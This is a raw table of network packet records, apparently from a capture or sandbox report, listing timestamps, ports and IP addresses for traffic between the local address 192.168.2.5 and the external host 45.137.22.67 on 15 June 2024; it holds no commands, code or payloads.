Jun 15, 2024 20:22:30.155257940 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157063961 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157110929 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157136917 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157161951 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157207966 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157233953 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157279968 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157305956 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157330990 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157377005 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157406092 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157569885 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157597065 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157623053 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157670021 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157696009 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157721996 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157747030 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157778025 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157859087 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157886028 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157912016 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157938004 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157963037 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.157989025 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158014059 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158041000 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158066034 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158092022 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158118010 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158143997 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158169985 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158195019 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158241987 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158267975 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158293009 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158318996 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158344030 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158395052 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158421040 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158468962 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158495903 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158521891 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158551931 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158577919 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158746958 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.158854008 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159012079 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159038067 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159243107 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159269094 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159353971 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159379959 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159481049 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159507036 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159605026 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159631014 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159657001 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159682989 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159729958 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159755945 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159780979 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159888983 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159915924 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159943104 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.159969091 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160018921 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160044909 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160070896 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160096884 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160124063 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160150051 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160176039 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160224915 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160250902 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160276890 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160303116 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160329103 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160353899 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160379887 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160406113 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160454988 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160499096 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160527945 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160553932 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160581112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160605907 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160633087 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160660028 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160686970 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160734892 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160762072 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160788059 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160814047 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160840034 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160866022 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160892010 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160917997 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160943985 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160969973 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.160995960 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161021948 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161047935 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161072969 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161098957 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161125898 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161151886 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161178112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161204100 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161230087 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161277056 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161303043 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161329031 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161355019 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161381006 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161406994 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161432981 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161458969 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161485910 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161511898 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161537886 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161564112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161591053 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161617041 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161643028 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161669016 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161695004 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161720991 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161746979 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161772966 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161798954 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161864996 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161892891 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161920071 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161946058 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161972046 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.161998034 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162024021 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162050962 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162076950 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162103891 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162130117 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162156105 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162180901 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162206888 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162233114 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162260056 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162291050 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162317038 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162343979 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162369013 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162395954 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162420988 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162446976 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162497044 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162523985 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162549973 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162575960 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162601948 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162628889 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162655115 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162681103 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162707090 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162733078 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162758112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162784100 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162810087 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162836075 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162862062 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162887096 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162913084 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162939072 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162965059 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.162991047 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.263437033 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.265634060 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.272528887 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.272600889 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.272996902 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.277863979 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.303421021 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.618541956 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.624706030 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.624773979 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.624803066 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.624814034 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.624840021 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.624860048 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.625994921 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626024008 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626049995 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626059055 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626076937 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626077890 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626090050 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626105070 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626122952 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626132011 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626152039 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626157999 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.626179934 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.626209021 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.640347004 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.640376091 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.640402079 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.640410900 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.640438080 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.640451908 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.642054081 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.642081976 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.642105103 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.642107964 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.642136097 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.642163992 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.642971039 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.643062115 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.690167904 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.694149971 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.746479988 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.746566057 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.798151016 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.798207998 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.846138954 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.846215010 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.891546965 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.891695023 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.891767979 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910505056 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910517931 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910528898 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910540104 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910551071 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910574913 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910577059 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910587072 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910598040 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910599947 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910609007 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910620928 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910630941 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910641909 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910643101 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910654068 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910665989 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910676003 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910677910 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910689116 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910691977 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910700083 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910708904 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910712004 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910722971 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910733938 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910746098 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910749912 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910757065 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910768032 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910778999 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910787106 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910793066 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910804987 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910815954 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910820961 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910825014 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910825014 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910830975 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910840034 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910845995 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910859108 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910870075 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910881042 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910881042 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910892010 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910903931 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910903931 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910914898 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910917997 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910927057 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910938978 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910940886 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910949945 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910960913 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910972118 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910973072 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910983086 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.910989046 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.910994053 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911005974 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911007881 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911016941 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911029100 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911031961 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911040068 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911051989 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911061049 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911062002 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911076069 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911098003 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911113977 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911679983 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911691904 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911703110 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.911736965 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.911760092 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919600964 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919657946 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919683933 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919711113 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919730902 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919738054 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919756889 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919773102 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919783115 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919801950 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919809103 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919831991 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919840097 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919855118 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919866085 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919914961 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.919950962 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.919976950 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920002937 CEST	55615	49723	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:31.920028925 CEST	49723	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:31.920028925 CEST	55615	49723	45.137.22.67	192.168.2.5
